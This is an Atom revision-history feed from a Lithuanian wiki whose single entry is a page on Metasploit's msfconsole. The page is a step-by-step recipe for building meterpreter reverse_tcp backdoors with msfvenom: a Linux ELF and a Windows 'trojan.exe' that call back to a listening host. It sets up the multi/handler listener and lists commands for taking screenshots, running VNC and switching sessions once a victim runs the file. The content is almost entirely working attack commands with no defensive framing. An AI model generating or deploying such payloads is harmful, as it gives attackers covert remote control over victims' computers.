<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="lt">
	<id>https://wiki.eofnet.lt/w//index.php?action=history&amp;feed=atom&amp;title=Msfconsole</id>
	<title>Msfconsole - Versijų istorija</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.eofnet.lt/w//index.php?action=history&amp;feed=atom&amp;title=Msfconsole"/>
	<link rel="alternate" type="text/html" href="https://wiki.eofnet.lt/w//index.php?title=Msfconsole&amp;action=history"/>
	<updated>2026-04-15T22:27:04Z</updated>
	<subtitle>Šio puslapio versijų istorija projekte</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.eofnet.lt/w//index.php?title=Msfconsole&amp;diff=8540&amp;oldid=prev</id>
		<title>\dev\null 16:51, 13 lapkričio 2017</title>
		<link rel="alternate" type="text/html" href="https://wiki.eofnet.lt/w//index.php?title=Msfconsole&amp;diff=8540&amp;oldid=prev"/>
		<updated>2017-11-13T16:51:35Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Naujas puslapis&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Metasploit&lt;br /&gt;
= Venom backdoor generavimas ir naudojimas sistemose =&lt;br /&gt;
LHOST = 192.168.0.101 - Jusu PC&lt;br /&gt;
== Linux ==&lt;br /&gt;
&lt;br /&gt;
[[Vaizdas:DF-dASQhSf2-PhCMlnkZxw.png]]&lt;br /&gt;
=== trojan generavimas ===&lt;br /&gt;
 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 -f elf -o payload.bin&lt;br /&gt;
=== Pasiklausymas ===&lt;br /&gt;
 msfconsole&lt;br /&gt;
 use exploit/multi/handler&lt;br /&gt;
 set PAYLOAD linux/x86/meterpreter/reverse_tcp&lt;br /&gt;
 set LPORT 4444&lt;br /&gt;
 set LHOST 0.0.0.0&lt;br /&gt;
 run&lt;br /&gt;
== Windows ==&lt;br /&gt;
=== trojan generavimas ===&lt;br /&gt;
 msfvenom -p windows/meterpreter/reverse_tcp --platform windows-a x86 -f exe LHOST=&amp;quot;192.168.0.101&amp;quot; LPORT=4444 -o trojan.exe&lt;br /&gt;
=== Pasiklausymas ===&lt;br /&gt;
 msfconsole&lt;br /&gt;
 use multi/handler&lt;br /&gt;
 set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
 set LPORT 4444&lt;br /&gt;
 set LHOST 0.0.0.0&lt;br /&gt;
 run&lt;br /&gt;
== Toliau ==&lt;br /&gt;
Toliau laukiame, kada bus paleistas trojan.exe, gavus kažką panašaus į:&lt;br /&gt;
 Meterpreter session 1 opened&lt;br /&gt;
Galime pasijungti arba vykdyti komandas iš šio sarašo ir t.t.&lt;br /&gt;
 run vnc&lt;br /&gt;
 screenshot&lt;br /&gt;
Perjungti sesijas&lt;br /&gt;
 sessions -i 1&lt;br /&gt;
&lt;br /&gt;
[[Category:Saugumas]]&lt;br /&gt;
[[Category:Tinklas]]&lt;/div&gt;</summary>
		<author><name>\dev\null</name></author>
	</entry>
</feed>